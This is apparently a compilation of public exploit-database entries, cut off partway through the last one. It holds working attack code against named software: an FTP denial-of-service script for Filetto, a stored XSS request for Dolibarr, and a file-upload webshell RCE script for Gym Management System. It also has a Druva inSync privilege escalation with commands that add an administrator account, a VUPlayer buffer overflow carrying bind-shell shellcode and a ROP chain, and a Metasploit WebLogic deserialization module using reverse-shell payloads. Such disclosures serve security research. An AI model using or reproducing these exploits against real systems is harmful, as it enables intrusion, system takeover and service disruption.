# Exploit Title: Filetto 1.0 - 'FEAT' Denial of Service (PoC) # Date: 2020-05-13 # Found by: Alvaro J. Gene (Socket_0x03) # Vendor Homepage: http://www.utillyty.eu # Software Link: https://sourceforge.net/projects/filetto # Vulnerable Application: Filetto # Version: 1.0 (last version. Updated: 01/31/2020) # Server: FTP Server # Vulnerable Command: FEAT # Tested on: Windows 7 SP1 ==================================================================================================== ======================== [ Filetto v1.0 - 'FEAT' Denial of Service (PoC) ] ========================= ==================================================================================================== from socket import * host = "192.168.0.14" port = 2021 username = "Socket_0x03" password = "password" s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) print s.recv(1024) s.send("USER %s\r\n" % (username)) print s.recv(1024) s.send("PASS %s\r\n" % (password)) print s.recv(1024) buffer = "FEAT " buffer += "\x41\x2c" * 11008 buffer += "\r\n" s.send(buffer) print s.recv(1024) s.close()

# Title: Dolibarr 11.0.3 - Persistent Cross-Site Scripting # Author: Mehmet Kelepce / Gais Cyber Security # Date : 2020-04-14 # Vendor: https://www.dolibarr.org/ # Exploit-DB Author ID: 8763 # Remotely Exploitable: Yes # Dynamic Coding Language: PHP # CVSSv3 Base Score: 7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L) # Bug: XSS - Cross Site Scripting # CVE: ## this vulnerability was found by examining the source code. PoC : Dolibarr 11.0.3 LDAP Synchronization Settings - HTTP POST REQUEST ########################################################## POST /dolibarr/admin/ldap.php?action=setvalue HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr/admin/ldap.php?action=test Content-Type: application/x-www-form-urlencoded Content-Length: 723 Connection: close Cookie: DOLSESSID_08b25d38fe3d8c5d83c5477f93783b26=abml2gjafuuqcos5lm1053tqu6; DOLINSTALLNOPING_b832abc1aadf61021c84b3def6cdf1e6=0 Upgrade-Insecure-Requests: 1 token=%242y%2410%245CjT4.D4w8Qe.uaL.pHuSeDOW9PB2gnNQ7MhYrYUt7W8hq2R3oXBe&activesynchro=0&activecontact=0&type=activedirectory&LDAP_SERVER_PROTOCOLVERSION=3&host=%22%3E%3CEMBED+SRC%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoJ0hlbGxvLCBEb2xpYmFyciEnKTs8L3NjcmlwdD48L3N2Zz4%3D%22+type%3D%22image%2Fsvg%2Bxml%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E&slave=&port=389&dn=&usetls=0&admin=&pass= Vulnerable parameters: host,slave,port Payload (base64): PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoJ0hlbGxvLCBEb2xpYmFyciEnKTs8L3NjcmlwdD48L3N2Zz4= Payload (decode) : <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss"><script type="text/ecmascript">alert('Hello, Dolibarr!');</script></svg> Parameter file: /dolibarr/admin/ldap.php ## Risk : cookie information of the target user is obtained.

# Exploit Title: Gym Management System 1.0 - Unauthenticated Remote Code Execution # Exploit Author: Bobby Cooke # Date: 2020-05-21 # Vendor Homepage: https://projectworlds.in/ # Software Link: https://projectworlds.in/free-projects/php-projects/gym-management-system-project-in-php/ # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Exploit Tested Using: Python 2.7.17 # Vulnerability Description: # Gym Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. # Exploit Details: # 1. Access the '/upload.php' page, as it does not check for an authenticated user session. # 2. Set the 'id' parameter of the GET request to the desired file name for the uploaded PHP file. # - `upload.php?id=kamehameha` # /upload.php: # 4 $user = $_GET['id']; # 34 move_uploaded_file($_FILES["file"]["tmp_name"], # 35 "upload/". $user.".".$ext); # 3. Bypass the extension whitelist by adding a double extension, with the last one as an acceptable extension (png). # /upload.php: # 5 $allowedExts = array("jpg", "jpeg", "gif", "png","JPG"); # 6 $extension = @end(explode(".", $_FILES["file"]["name"])); # 14 && in_array($extension, $allowedExts)) # 4. Bypass the file type check by modifying the 'Content-Type' of the 'file' parameter to 'image/png' in the POST request, and set the 'pupload' paramter to 'upload'. # 7 if(isset($_POST['pupload'])){ # 8 if ((($_FILES["file"]["type"] == "image/gif") # 11 || ($_FILES["file"]["type"] == "image/png") # 5. In the body of the 'file' parameter of the POST request, insert the malicious PHP code: # <?php echo shell_exec($_GET["telepathy"]); ?> # 6. The Web Application will rename the file to have the extension with the second item in an array created from the file name; seperated by the '.' character. # 30 $pic=$_FILES["file"]["name"]; # 31 $conv=explode(".",$pic); # 32 $ext=$conv['1']; # - Our uploaded file name was 'kaio-ken.php.png'. Therefor $conv['0']='kaio-ken'; $conv['1']='php'; $conv['2']='png'; # 7. Communicate with the webshell at '/upload.php?id=kamehameha' using GET Requests with the telepathy parameter. import requests, sys, urllib, re from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) def webshell(SERVER_URL, session): try: WEB_SHELL = SERVER_URL+'upload/kamehameha.php' getdir = {'telepathy': 'echo %CD%'} r2 = session.get(WEB_SHELL, params=getdir, verify=False) status = r2.status_code if status != 200: print Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') cwd = re.findall('[CDEF].*', r2.text) cwd = cwd[0]+"> " term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET while True: thought = raw_input(term) command = {'telepathy': thought} r2 = requests.get(WEB_SHELL, params=command, verify=False) status = r2.status_code if status != 200: r2.raise_for_status() response2 = r2.text print(response2) except: print("\r\nExiting.") sys.exit(-1) def formatHelp(STRING): return Style.BRIGHT+Fore.RED+STRING+Fore.RESET def header(): BL = Style.BRIGHT+Fore.GREEN RS = Style.RESET_ALL FR = Fore.RESET SIG = BL+' /\\\n'+RS SIG += Fore.YELLOW+'/vvvvvvvvvvvv '+BL+'\\'+FR+'--------------------------------------,\n' SIG += Fore.YELLOW+'`^^^^^^^^^^^^'+BL+' /'+FR+'============'+Fore.RED+'BOKU'+FR+'====================="\n' SIG += BL+' \/'+RS+'\n' return SIG if __name__ == "__main__": print header(); if len(sys.argv) != 2: print formatHelp("(+) Usage:\t python %s <WEBAPP_URL>" % sys.argv[0]) print formatHelp("(+) Example:\t python %s 'https://10.0.0.3:443/gym/'" % sys.argv[0]) sys.exit(-1) SERVER_URL = sys.argv[1] UPLOAD_DIR = 'upload.php?id=kamehameha' UPLOAD_URL = SERVER_URL + UPLOAD_DIR s = requests.Session() s.get(SERVER_URL, verify=False) PNG_magicBytes = '\x89\x50\x4e\x47\x0d\x0a\x1a' png = { 'file': ( 'kaio-ken.php.png', PNG_magicBytes+'\n'+'<?php echo shell_exec($_GET["telepathy"]); ?>', 'image/png', {'Content-Disposition': 'form-data'} ) } fdata = {'pupload': 'upload'} r1 = s.post(url=UPLOAD_URL, files=png, data=fdata, verify=False) webshell(SERVER_URL, s)

# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation # Date: 2020-05-21 # Exploit Author: Matteo Malvica # Credits: Chris Lyne for previous version's exploit # Vendor Homepage: druva.com # Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi # Version: 6.6.3 # Tested on: Windows 10 1909-18363.778 # CVE: CVE-2020-5752 # Command injection in inSyncCPHwnet64 RPC service # Runs as nt authority\system. so we have a local privilege escalation # The path validation has been only implemented through a 'strncmp' function which can be bypassed by # appending a directory traversal escape sequence at the end of the valid path. # Writeup: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/ # Example usage: #python insync.py "windows\system32\cmd.exe /C net user Leon /add" #python insync.py "windows\system32\cmd.exe /C net localgroup Administrators Leon /add" import socket import struct import sys if len(sys.argv) < 2: print "Usage: " + __file__ + " <quoted command to execute>" print "E.g. " + __file__ + " \"net user /add tenable\"" sys.exit(0) ip = '127.0.0.1' port = 6064 command_line = 'C:\\ProgramData\\Druva\\inSync4\\..\\..\\..\\..\\..\\..\\..\\..\\' + sys.argv[1] def make_wide(str): new_str = '' for c in str: new_str += c new_str += '\x00' return new_str hello = "inSync PHC RPCW[v0002]" func_num = "\x05\x00\x00\x00" # 05 is to run a command, passed as an agrument to CreateProcessW command_line = make_wide(command_line) # converts ascii to UTF-8 command_length = struct.pack('<i', len(command_line)) # packed as little-endian integer requests = [ hello, func_num, command_length, command_line ] # sends each request separately sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((ip, port)) i = 1 for req in requests: print 'Sending request' + str(i) sock.send(req) i += 1 sock.close() print "Done."

# Exploit title: VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP,ASLR) # Date: 2020-05-22 # Exploit Author: Gobinathan L # Vendor Homepage: http://www.vuplayer.com/ # Version: v2.49 # Tested on: Windows 7 Professional with ALSR and Full DEP Turned ON. # Usage : $ python <exploit>.py #===================================[ VUPlayer 2.49 Exploit Generator ]======================================# import struct # msfvenom -p windows/shell_bind_tcp exitfunc=thread -b "\x00\x0a\x0d\x1a" -f c shell = ("\xd9\xc9\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x53\xbd\xa9\xc1\xbf" "\xb1\x83\xc2\x04\x31\x6a\x13\x03\xc3\xd2\x5d\x44\xef\x3d\x23" "\xa7\x0f\xbe\x44\x21\xea\x8f\x44\x55\x7f\xbf\x74\x1d\x2d\x4c" "\xfe\x73\xc5\xc7\x72\x5c\xea\x60\x38\xba\xc5\x71\x11\xfe\x44" "\xf2\x68\xd3\xa6\xcb\xa2\x26\xa7\x0c\xde\xcb\xf5\xc5\x94\x7e" "\xe9\x62\xe0\x42\x82\x39\xe4\xc2\x77\x89\x07\xe2\x26\x81\x51" "\x24\xc9\x46\xea\x6d\xd1\x8b\xd7\x24\x6a\x7f\xa3\xb6\xba\xb1" "\x4c\x14\x83\x7d\xbf\x64\xc4\xba\x20\x13\x3c\xb9\xdd\x24\xfb" "\xc3\x39\xa0\x1f\x63\xc9\x12\xfb\x95\x1e\xc4\x88\x9a\xeb\x82" "\xd6\xbe\xea\x47\x6d\xba\x67\x66\xa1\x4a\x33\x4d\x65\x16\xe7" "\xec\x3c\xf2\x46\x10\x5e\x5d\x36\xb4\x15\x70\x23\xc5\x74\x1d" "\x80\xe4\x86\xdd\x8e\x7f\xf5\xef\x11\xd4\x91\x43\xd9\xf2\x66" "\xa3\xf0\x43\xf8\x5a\xfb\xb3\xd1\x98\xaf\xe3\x49\x08\xd0\x6f" "\x89\xb5\x05\x05\x81\x10\xf6\x38\x6c\xe2\xa6\xfc\xde\x8b\xac" "\xf2\x01\xab\xce\xd8\x2a\x44\x33\xe3\x45\xc9\xba\x05\x0f\xe1" "\xea\x9e\xa7\xc3\xc8\x16\x50\x3b\x3b\x0f\xf6\x74\x2d\x88\xf9" "\x84\x7b\xbe\x6d\x0f\x68\x7a\x8c\x10\xa5\x2a\xd9\x87\x33\xbb" "\xa8\x36\x43\x96\x5a\xda\xd6\x7d\x9a\x95\xca\x29\xcd\xf2\x3d" "\x20\x9b\xee\x64\x9a\xb9\xf2\xf1\xe5\x79\x29\xc2\xe8\x80\xbc" "\x7e\xcf\x92\x78\x7e\x4b\xc6\xd4\x29\x05\xb0\x92\x83\xe7\x6a" "\x4d\x7f\xae\xfa\x08\xb3\x71\x7c\x15\x9e\x07\x60\xa4\x77\x5e" "\x9f\x09\x10\x56\xd8\x77\x80\x99\x33\x3c\xa0\x7b\x91\x49\x49" "\x22\x70\xf0\x14\xd5\xaf\x37\x21\x56\x45\xc8\xd6\x46\x2c\xcd" "\x93\xc0\xdd\xbf\x8c\xa4\xe1\x6c\xac\xec") ret = struct.pack("<I", 0x10010158) def create_rop_chain(): rop_gadgets = [ 0x100106e1, #POP EBP RET 0x100106e1, #Ptr to POP EBP RET popped into EBP 0x10015f82, #POP EAX RET 0xfffffdff, #Value to Negate.. result in 0x201 0x10014db4, #NEG EAX RET 0x10032f72, #XCHG EAX, EBX RET 0x10015f82, #POP EAX RET 0xffffffc0, #Value to negate ..result in 0x40 0x10014db4, #NEG EAX RET 0x10038a6d, #XCHG EAX, EDX RET 0x106053e5, #POP ECX RET 0x101082cc, #Random Location with Write Access 0x1001621c, #POP EDI RET 0x10010158, #RET will be stored in EDI 0x10604154, #POP ESI RET 0x10101c02, #JMP [EAX] 0x10015f77, # POP EAX # RETN [BASS.dll] 0x10109270, # ptr to &VirtualProtect() [IAT BASSWMA.dll] 0x1001d7a5, # PUSHAD # RETN 0x10022aa7, # JMP ESP ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() shellcode = "\x90"*32 + shell buffer = "A"*1012 buffer+= ret buffer+= rop_chain buffer+= shellcode buffer+= "\x90"*(2500 - len(buffer)) try: f = open("exploit.m3u", "w") f.write(buffer) print("[+] Payload Generated Successfully.") print("[+] Check for Open Port [4444] on Target Machine. A Bind shell is waiting for you..") f.close() except: print("[-] Couldn't Generate Payload.")

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager include Msf::Exploit::Powershell include Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'WebLogic Server Deserialization RCE - BadAttributeValueExpException', 'Description' => %q{ There exists a Java object deserialization vulnerability in multiple versions of WebLogic. Unauthenticated remote code execution can be achieved by sending a serialized BadAttributeValueExpException object over the T3 protocol to vulnerable WebLogic servers. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jang', # Vuln Discovery 'Y4er', # PoC 'Shelby Pace' # Metasploit Module ], 'References' => [ [ 'CVE', '2020-2555' ], [ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ], [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ] ], 'Platform' => %w[unix linux win], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Privileged' => false, 'Targets' => [ [ 'Windows', { 'Platform' => 'win', 'Arch' => [ ARCH_X86, ARCH_X64 ], 'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' } } ], [ 'Unix', { 'Platform' => %w[unix linux], 'CmdStagerFlavor' => 'printf', 'Arch' => [ ARCH_X86, ARCH_X64 ], 'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' } } ], ], 'DisclosureDate' => '2020-01-15', 'DefaultTarget' => 0 ) ) register_options([ Opt::RPORT(7001) ]) end def check connect web_req = "GET /console/login/LoginForm.jsp HTTP/1.1\nHost: #{peer}\n\n" sock.put(web_req) sleep(2) res = sock.get_once versions = [ Gem::Version.new('12.1.3.0.0'), Gem::Version.new('12.2.1.3.0'), Gem::Version.new('12.2.1.4.0') ] return CheckCode::Unknown('Failed to obtain response from service') unless res /WebLogic\s+Server\s+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res return CheckCode::Unknown('Failed to detect WebLogic') unless version @version_no = Gem::Version.new(version) print_status("WebLogic version detected: #{@version_no}") return CheckCode::Appears if versions.include?(@version_no) CheckCode::Detected('Version of WebLogic is not vulnerable') ensure disconnect end def exploit super connect print_status('Sending handshake...') t3_handshake if target.name == 'Windows' win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true }) win_obj.prepend('cmd.exe /c ') win_obj = build_payload_obj(win_obj) t3_send(win_obj) else execute_cmdstager end ensure disconnect end def t3_handshake # t3 12.2.1\nAS:255 # \nHL:19\nMS:100000 # 00\n\n shake = '74332031322e322e310a41533a323535' shake << '0a484c3a31390a4d533a313030303030' shake << '30300a0a' sock.put([shake].pack('H*')) sleep(1) sock.get_once end def build_payload_obj(payload_data) payload_obj = 'aced' # STREAM_MAGIC payload_obj << '0005' # STREAM_VERSION payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '002e' # Class name length: 46 payload_obj << '6a617661782e6d616e61' # Class name: javax.management.BadAttributeValueExpException payload_obj << '67656d656e742e426164' payload_obj << '41747472696275746556' payload_obj << '616c7565457870457863' payload_obj << '657074696f6e' payload_obj << 'd4e7daab632d4640' # SerialVersionUID payload_obj << '020001' # Serialization flag, field num = 1 payload_obj << '4c0003' # Field type code: 4c = Object, field name length: 3 payload_obj << '76616c' # Field name: val payload_obj << '740012' # String, length: 18 payload_obj << '4c6a6176612f6c616e672f4f626a6563743b' # Ljava/lang/Object; payload_obj << '7872' # end block data, TC_CLASSDESC payload_obj << '0013' # Class name length: 19 payload_obj << '6a6176612e6c616e672e' # java.lang.Exception payload_obj << '457863657074696f6e' payload_obj << 'd0fd1f3e1a3b1cc4' # SerialVersionUID payload_obj << '020000' # Serializable, No fields payload_obj << '7872' # end block data, TC_CLASSDESC payload_obj << '0013' # Class name length: 19 payload_obj << '6a6176612e6c616e672e' # java.lang.Throwable payload_obj << '5468726f7761626c65' payload_obj << 'd5c635273977b8cb' # SerialVersionUID payload_obj << '030004' # ?, then 4 fields payload_obj << '4c0005' # Field type: Object, field name length: 5 payload_obj << '6361757365' # Field name: cause payload_obj << '740015' # String, length: 21 payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/Throwable; payload_obj << '2f5468726f7761626c653b' payload_obj << '4c000d' # Field type: Object, field name length: 13 payload_obj << '64657461696c4d657373616765' # Field name: detailMessage payload_obj << '740012' # String, length: 18 payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/String; payload_obj << '2f537472696e673b' payload_obj << '5b000a' # Field type: 5b = array, field name length: 10 payload_obj << '737461636b5472616365' # Field name: stackTrace payload_obj << '74001e' # String, length: 30 payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/StackTraceElement; payload_obj << '672f537461636b547261' payload_obj << '6365456c656d656e743b' payload_obj << '4c0014' # Field type: Object, field name length: 20 payload_obj << '73757070726573736564' # Field name: suppressedExceptions payload_obj << '457863657074696f6e73' payload_obj << '740010' # String, length: 16 payload_obj << '4c6a6176612f7574696c' # Ljava/util/List; payload_obj << '2f4c6973743b' payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '71' # TC_REFERENCE payload_obj << '007e0008' # handle? payload_obj << '7075' # TC_NULL, TC_ARRAY payload_obj << '72001e' # TC_CLASSDESC, Class name length: 30 payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.StackTraceElement; payload_obj << '672e537461636b547261' payload_obj << '6365456c656d656e743b' payload_obj << '02462a3c3cfd2239' # SerialVersionUID payload_obj << '020000' # Serializable, No fields payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000001' payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '001b' # Class name length: 27 payload_obj << '6a6176612e6c616e672e' # java.lang.StackTraceElement payload_obj << '537461636b5472616365' payload_obj << '456c656d656e74' payload_obj << '6109c59a2636dd85' # SerialVersionUID payload_obj << '020004' # Serializable, 4 fields payload_obj << '49000a' # Field type: 49 = Integer, field name length: 10 payload_obj << '6c696e654e756d626572' # lineNumber payload_obj << '4c000e' # Field type: Object, field name length: 14 payload_obj << '6465636c6172696e6743' payload_obj << '6c617373' # declaringClass payload_obj << '71' # TC_REFERENCE payload_obj << '007e0005' # handle payload_obj << '4c0008' # Field type: Object, field name length: 8 payload_obj << '66696c654e616d65' # fileName payload_obj << '71' # TC_REFERENCE payload_obj << '007e0005' # handle payload_obj << '4c000a' # Field type: Object, field name length: 10 payload_obj << '6d6574686f644e616d65' # methodName payload_obj << '71' # TC_REFERENCE payload_obj << '007e0005' # handle payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000028' class_name = Rex::Text.rand_text_alphanumeric(8..14) formatted_class = class_name.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join payload_obj << '74' # String payload_obj << class_name.length.to_s(16).rjust(4, '0') payload_obj << formatted_class # Originally Weblogic_2555 -> PoC class name payload_obj << '74' # String payload_obj << (class_name.length + 5).to_s(16).rjust(4, '0') payload_obj << formatted_class # Originally Weblogic_2555.java payload_obj << '2e6a617661' # .java payload_obj << '740004' # String, length: 4 payload_obj << '6d61696e' # main payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '0026' # Class name length: 38 payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableList payload_obj << '436f6c6c656374696f6e' payload_obj << '7324556e6d6f64696669' payload_obj << '61626c654c697374' payload_obj << 'fc0f2531b5ec8e10' # SerialVersionUID payload_obj << '020001' # Serializable, 1 field payload_obj << '4c0004' # Field type: Object, field name length: 4 payload_obj << '6c697374' # list payload_obj << '71' # TC_REFERENCE payload_obj << '007e0007' # handle payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC payload_obj << '002c' # Class name length: 44 payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableCollection payload_obj << '436f6c6c656374696f6e' payload_obj << '7324556e6d6f64696669' payload_obj << '61626c65436f6c6c6563' payload_obj << '74696f6e' payload_obj << '19420080cb5ef71e' # SerialVersionUID payload_obj << '020001' # Serializable, 1 field payload_obj << '4c0001' # Field type: Object, field name length: 1 payload_obj << '63' # Field name: c payload_obj << '740016' # String, length: 22 payload_obj << '4c6a6176612f7574696c' # Ljava/util/Collection; payload_obj << '2f436f6c6c656374696f' payload_obj << '6e3b' payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '0013' # Class name length: 19 payload_obj << '6a6176612e7574696c2e' # java.util.ArrayList payload_obj << '41727261794c697374' payload_obj << '7881d21d99c7619d' # SerialVersionUID payload_obj << '030001' # ?, 1 field payload_obj << '490004' # Field type: Integer, field name length: 4 payload_obj << '73697a65' # size payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000000' payload_obj << '7704' # TC_BLOCKDATA, length: 4 payload_obj << '00000000' payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE payload_obj << '007e0015' # handle payload_obj << '78' # TC_ENDBLOCKDATA payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '0024' # Class name length: 36 payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.filter.LimitFilter payload_obj << '6f6c2e7574696c2e6669' payload_obj << '6c7465722e4c696d6974' payload_obj << '46696c746572' payload_obj << limit_filter_uid # SerialVersionUID payload_obj << '020006' # Serializable, 6 fields payload_obj << '49000b' # Field type: Integer, field name length: 11 payload_obj << '6d5f635061676553697a65' # m_cPageSize payload_obj << '490007' # Field type: Integer, field name length: 7 payload_obj << '6d5f6e50616765' # m_nPage payload_obj << '4c000c' # Field type: Object, field name length: 12 payload_obj << '6d5f636f6d70617261746f72' # m_comparator payload_obj << '740016' # String, length: 22 payload_obj << '4c6a6176612f7574696c' # Ljava/util/Comparator; payload_obj << '2f436f6d70617261746f' payload_obj << '723b' payload_obj << '4c0008' # Field type: Object, field name length: 8 payload_obj << '6d5f66696c746572' # m_filter payload_obj << '74001a' # String, length: 26 payload_obj << '4c636f6d2f74616e676f' # Lcom/tangosol/util/Filter; payload_obj << '736f6c2f7574696c2f46' payload_obj << '696c7465723b' payload_obj << '4c000f' # Field type: Object, field name length: 15 payload_obj << '6d5f6f416e63686f7242' # m_oAnchorBottom payload_obj << '6f74746f6d' payload_obj << '71' # TC_REFERENCE payload_obj << '007e0001' # handle payload_obj << '4c000c' # Field type: Object, field name length: 12 payload_obj << '6d5f6f416e63686f72546f70' # m_oAnchorTop payload_obj << '71' # TC_REFERENCE payload_obj << '007e0001' # handle unless @version_no == Gem::Version.new('12.1.3.0.0') payload_obj << add_class_desc end payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000000' payload_obj << '00000000' payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '002c' # Class name length: 44 payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ChainedExtractor payload_obj << '6f6c2e7574696c2e6578' payload_obj << '74726163746f722e4368' payload_obj << '61696e65644578747261' payload_obj << '63746f72' payload_obj << chained_extractor_uid # SerialVersionUID payload_obj << '020000' # Serializable, no fields payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC payload_obj << '0036' # Class name length: 54 payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractCompositeExtractor payload_obj << '6f6c2e7574696c2e6578' payload_obj << '74726163746f722e4162' payload_obj << '737472616374436f6d70' payload_obj << '6f736974654578747261' payload_obj << '63746f72' payload_obj << '086b3d8c05690f44' # SerialVersionUID payload_obj << '020001' # Serializable, 1 field payload_obj << '5b000c' # Field type: Array, field name length: 12 payload_obj << '6d5f61457874726163746f72' # m_aExtractor payload_obj << '740023' # String, length: 35 payload_obj << '5b4c636f6d2f74616e67' # [Lcom/tangosol/util/ValueExtractor; payload_obj << '6f736f6c2f7574696c2f' payload_obj << '56616c75654578747261' payload_obj << '63746f723b' payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC payload_obj << '002d' # Class name length: 45 payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractExtractor payload_obj << '6f6c2e7574696c2e6578' payload_obj << '74726163746f722e4162' payload_obj << '73747261637445787472' payload_obj << '6163746f72' payload_obj << abstract_extractor_uid # SerialVersionUID payload_obj << '020001' # Serializable, 1 field payload_obj << '490009' # Field type: Integer, field name length: 9 payload_obj << '6d5f6e546172676574' # m_nTarget payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000000' payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC payload_obj << '0032' # Class name length: 50 payload_obj << '5b4c636f6d2e74616e67' # [Lcom.tangosol.util.extractor.ReflectionExtractor; payload_obj << '6f736f6c2e7574696c2e' payload_obj << '657874726163746f722e' payload_obj << '5265666c656374696f6e' payload_obj << '457874726163746f723b' payload_obj << 'dd8b89aed70273ca' # SerialVersionUID payload_obj << '020000' # Serializable, no fields payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000003' payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '002f' # Class name length: 47 payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ReflectionExtractor payload_obj << '6f6c2e7574696c2e6578' payload_obj << '74726163746f722e5265' payload_obj << '666c656374696f6e4578' payload_obj << '74726163746f72' payload_obj << reflection_extractor_uid # SerialVersionUID payload_obj << '02000' # Serializable, variable fields orig: 020002 payload_obj << reflect_extract_count payload_obj << '5b0009' # Field type: Array, field name length: 9 payload_obj << '6d5f616f506172616d' # m_aoParam payload_obj << '740013' # String, length: 19 payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/Object; payload_obj << '672f4f626a6563743b' payload_obj << add_sect payload_obj << '4c0009' # Object, length: 9 payload_obj << '6d5f734d6574686f64' # m_sMethod payload_obj << '71' # TC_REFERENCE payload_obj << '007e0005' # handle payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE payload_obj << (change_handle? ? '007e001d' : '007e001e') payload_obj << '00000000' payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC payload_obj << '0013' # Class name length: 19 payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Object; payload_obj << '672e4f626a6563743b' payload_obj << '90ce589f1073296c' # SerialVersionUID payload_obj << '020000' # Serializable, no fields payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000002' payload_obj << '74000a' # String, length: 10 payload_obj << '67657452756e74696d65' # getRuntime payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC payload_obj << '0012' # Class name length: 18 payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Class; payload_obj << '672e436c6173733b' payload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID payload_obj << '020000' # Serializable, no fields payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000000' payload_obj << add_tc_null payload_obj << '740009' # String, length: 9 payload_obj << '6765744d6574686f64' # getMethod payload_obj << 